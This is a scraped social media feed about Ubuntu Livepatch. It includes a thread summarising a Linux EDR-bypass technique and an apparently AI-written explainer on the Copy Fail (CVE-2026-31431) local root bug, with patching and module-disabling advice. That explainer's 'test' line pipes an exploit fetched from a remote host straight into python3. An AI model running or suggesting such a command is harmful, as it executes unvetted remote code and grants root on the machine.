Good morning! The Livepatch zzz summary clip is coming today. I don't know what time, because I've handed the editing to my manager, lol. Have a nice day 💜🍀✨️
1
3
52
Marco Cappellari retweeted
Ubuntu Livepatch is a feature that applies kernel security fixes while the system is still running, so you do not need to reboot immediately after every kernel update. 👉 tecmint.com/enable-ubuntu-li… Follow @tecmint for more #Linux tips.
5
6
36
2,002
Ubuntu Livepatch: Patch kernels without rebooting on Ubuntu 26.04 www-tecmint-com.translate.go…

7
Replying to @Alok_0x
You do know that Ubuntu 26.04LTS is released now?! It is better than Ubuntu 24.04LTS! Go to Ubuntu.com and get Ubuntu Pro since it will get you Livepatch etc
2
9
mohammed baobaid retweeted
Jun 2
Starting with Ubuntu 26.04 LTS, @Canonical Livepatch now extends its rebootless kernel patching capability to Arm64 for the first time. For organizations running Ubuntu on Arm64 server and edge hardware, this means critical kernel updates can be applied without service interruption. Learn more about Ubuntu 26.04 LTS: ubuntu.com/blog/canonical-re… #Ubuntu #Livepatch #Security
3
48
252
25,689
>he doesn't know about livepatch
1
11
VCF 9.1.0.0100 (9.1 EP1) has been released 📝 This version includes fixes for various security vulnerabilities in each component. If ESX 9.1 is already applied, the update to 9.1 EP1 can be done via LivePatch 🙇 Release Note techdocs.broadcom.com/us/en/… Download support.broadcom.com/group/e… #VMware #VCF

1
8
1,378
🚨 Critical Threat Intelligence Alert 🚨
Research published yesterday by specialist @MatheuzSecurity reveals a local protection bypass technique targeting the Trend Micro Deep Security Agent on Linux. By generating a controlled “event storm” (high volume of filesystem and process events), it is possible to force the agent to unload the kernel modules bmhook and tmhook, creating a temporary window without behavioral monitoring.
Full article PoC: matheuzsecurity.github.io/ha…
(1/3) #CyberSecurity #ThreatIntelligence #EDR

Post 2/3 ⚠️ Technical Details
• Affected modules: bmhook (Behavior Monitoring) and tmhook (Generic Syscall-Hooking via livepatch).
• Trigger: High-volume benign event storm (writes, renames, symlinks, forks, and exits).
• Mechanism: The ds_am.init process executes rmmod on the modules as part of the agent’s internal recovery mechanism under load.
• Exposure window: Approximately 1.3 seconds without the modules loaded up to ~19.6 seconds for full transition. During this interval, actions normally blocked by the EDR can be executed successfully.
(2/3) #LinuxSecurity #EndpointProtection #InfoSec

Post 3/3 📌 Impact and Recommendations for Security Teams
This represents a degradation of the EDR’s own recovery mechanism, exploitable in a repeatable manner by unprivileged local users (or by malware already present on the endpoint). It enables artifact staging and evasion of behavioral detections.
Recommended actions:
• Actively monitor module unload logs (dmesg, /proc/modules)
• Assess exposure in Linux environments running Deep Security Agent
• Implement additional telemetry and compensating controls
• Monitor for official vendor response
Excellent research work by @MatheuzSecurity.
(3/3) #RedTeam #BlueTeam #VulnResearch #MalwareAnalysis #ThreatHunting
4
15
1,457
Starting with Ubuntu 26.04 LTS, @Canonical Livepatch now extends its rebootless kernel patching capability to Arm64 for the first time. For organizations running Ubuntu on Arm64 server and edge hardware, this means critical kernel updates can be applied without service interruption. Learn more about Ubuntu 26.04 LTS: ubuntu.com/blog/canonical-re… #Ubuntu #Livepatch #Security
1
4
49
2,539
Replying to @piyush784066
systemd
systemd-resolved
Snap
Forced Firefox Snap
AppArmor by default
Netplan
cloud-init
Ubuntu Pro nagging and MotD advertising
Amazon search lens history
Telemetry
Unattended upgrades
GNOME (itself)
GNOME heavily patched by Canonical
NetworkManager
journald binary logs
PolicyKit / polkit
D-Bus dependency sprawl
PackageKit / Software Center layers
PPA culture
Apt mixed with Snap mixed with Flatpak
Canonical NIH syndrome: Upstart, Unity, Mir, Snap, Launchpad, Bazaar, Netplan: Canonical keeps inventing its own stack, then sometimes abandoning parts of it.
Launchpad centralization
ESM / security update segmentation
Livepatch as a Canonical service
Advantage/Pro client packages
Apport
Whoopsie
Tracker / indexing services — GNOME file indexers that can chew resources and feel invasive.
Avahi zeroconf/mDNS daemon running for local network discovery, sometimes unnecessary attack surface.
CUPS browsing / printer auto-discovery
ModemManager often installed even when you do not use mobile broadband.
Bluetooth stack always lurking BlueZ and GUI layers.
A pile of background daemons for “convenience” the classic Ubuntu problem: usable, but increasingly less minimalist and less legible.
Corporate desktop assumptions Debian base with Canonical control layer on top.
The tragedy: underneath is Debian; above it is a Canonical product funnel.
That's just off the top of my head to start.
3
1
6
140
**CVE-2026-31431 ("Copy Fail")** is a serious **local privilege escalation (LPE)** in the Linux kernel. It allows any ordinary (non-root) user to gain root access on the system.

### What exactly does the vulnerability allow?

- The bug is in the **algif_aead** module (part of AF_ALG, the kernel's user-space crypto API).
- Using the `AF_ALG` and `splice()` system calls, an attacker can perform a **controlled 4-byte write** into the *page cache* (in-memory cache) of any file they can read.
- It typically targets setuid binaries such as `/usr/bin/su`, `/usr/bin/sudo`, etc. → modifies them in memory (not on disk!), runs them and gets root.
- The exploit is extremely reliable (100%, no race condition) and works on all major distributions since 2017 (Ubuntu, RHEL, Amazon Linux, SUSE, Debian, Fedora, Rocky, Alma, etc.).
- It also works in containers (Docker, Kubernetes) → it can escape from the container to the host (the page cache is shared).
- The PoC is public (732 bytes of Python) and works the same on all affected systems.

**It is not a remote vulnerability**: it requires a local account (shell, user code in CI, container, etc.).

### How do you find out whether your server/computer is vulnerable?

1. **Check the kernel version**
   ```bash
   uname -r
   ```
2. **Update the system and check whether you have the patch**
   - **Ubuntu/Debian**:
     ```bash
     sudo apt update && sudo apt upgrade
     uname -r # must be newer than before the update
     ```
     Ubuntu released a mitigation via the `kmod` package (disabling the module) and later kernels.
   - **RHEL / Alma / Rocky / Fedora**:
     ```bash
     sudo dnf update
     ```
   - **Amazon Linux**: See ALAS (Amazon Linux Security).
   - **In general**: Compare your kernel version with your distribution's advisory (search for "CVE-2026-31431" plus the distro name). The patched kernel contains a revert of an optimization from 2017 (commit `a664bf3`).
3. **Quick vulnerability test (on test systems only!)**
   ```bash
   curl copy.fail/exp | python3
   ```
   If it gives you a root shell (`id` shows uid=0), you are vulnerable. **Warning**: Run only on your own/test machines. Reboot after the test.

### Immediate protection (even if you don't have the patch yet)

```bash
# Disable the vulnerable module (works on most systems)
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead 2>/dev/null || true
```

- After this the exploit should fail.
- For persistence, reboot and check:
  ```bash
  lsmod | grep algif_aead # should show nothing
  ```

Other options: seccomp filters blocking `AF_ALG` sockets (suitable for containers/CI), or livepatch (KernelCare etc.).

### Recommendations

- **Update the kernel and reboot** → this is the only complete fix.
- If you have a multi-tenant environment (servers with multiple users, Kubernetes, CI runners, cloud instances), the priority is **high**.
- On a personal computer (where you are the only user) the risk is lower, but fix it anyway.

If you send me the output of `uname -r` and which distribution/version you have, I can tell you more precisely whether you are already fine.
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. xint.io/blog/copy-fail-linux…
1
3
687
Replying to @ubuntu
Will a fix come via Ubuntu livepatch at some point?
6
2,408
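Some distributions have zero-downtime Linux kernel patching like Ubuntu's Kernel Livepatch, but since this is a feature offered through enterprise subscriptions, it seems to be available to individuals only in a limited way. Just as LE made certificates free and brought about the spread of https, will kernel livepatch become mainstream?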
3
4
257
Just logged into my workstation, tried to install some software... and nothing. 😑 Turns out Canonical and Ubuntu are facing a "sustained" attack right now. ⚠️ Quick breakdown: Down: Snap, Login, Launchpad, Livepatch, and official sites. OK: The OS is safe and APT repos (mirrors) are still working. Don't tweak your config if things are failing—it’s on their end! 🛠️ #Ubuntu #Linux #Canonical
1
2
273